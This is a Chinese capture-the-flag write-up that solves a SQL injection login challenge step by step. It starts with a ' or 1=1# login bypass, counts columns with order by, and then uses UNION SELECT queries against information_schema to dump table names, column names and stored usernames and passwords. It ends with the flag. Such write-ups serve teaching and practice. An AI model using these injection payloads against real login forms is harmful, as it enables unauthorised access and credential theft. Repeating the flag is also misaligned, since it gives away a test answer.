1.题目描述

2.一般遇到登录，用户名会尝试admin，密码会尝试万能密码" or 1=1#或者' or 1=1#。这里尝试了第一种，但是不对。

3.接着尝试第二种' or 1=1#。提示登录成功了说明这里是单引号注入，并给了一串字符

4.sql注入题一般会设计到数据库，因为会用到select查询，所以我们得要知道它的表中有多少列，于是我们用order by来查询列数。

经过两次对比可说明，一共有4列。

5.接下来用联合查询查表,在登录界面的密码框输入下面这段代码，就可以得到表名，一共得到两个表名

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#

6.接着查表中有哪些字段，先查第一张表在密码输入框输入下面代码（查看geekuser表中字段），就得到了字段名，三个。

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'#

7.接下来查第二张表的字段，在密码输入框中输入下面代码，可以得到字段名，发现和第一张表的字段名一样。

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#

8.最后分别查询字段里面的信息，先查第一张表中的字段信息。

1' union select 1,2,group_concat(id,username,password) from geekuser#

9.最后查第二张表的字段信息

​1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#​

10.flag为

flag{35943351-4544-4af1-a33e-d5e3dde29eda}

11.这是我耗时最长的一道题，但是能弄清它的思路对我来说是受益匪浅的。